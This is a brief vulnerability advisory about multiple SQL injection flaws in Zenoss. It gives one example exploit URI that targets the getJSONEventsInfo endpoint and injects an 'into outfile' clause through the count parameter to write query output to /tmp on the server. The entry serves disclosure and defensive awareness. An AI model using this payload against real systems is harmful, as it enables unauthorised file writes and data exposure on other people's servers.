Zenoss Multiple SQL Injection Vulnerabilities

Zenoss Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URI and data are available:

http://www.example.com/zport/dmd/Events/getJSONEventsInfo?severity=1&state=1&filter=& offset=0&count=60 into outfile "/tmp/z"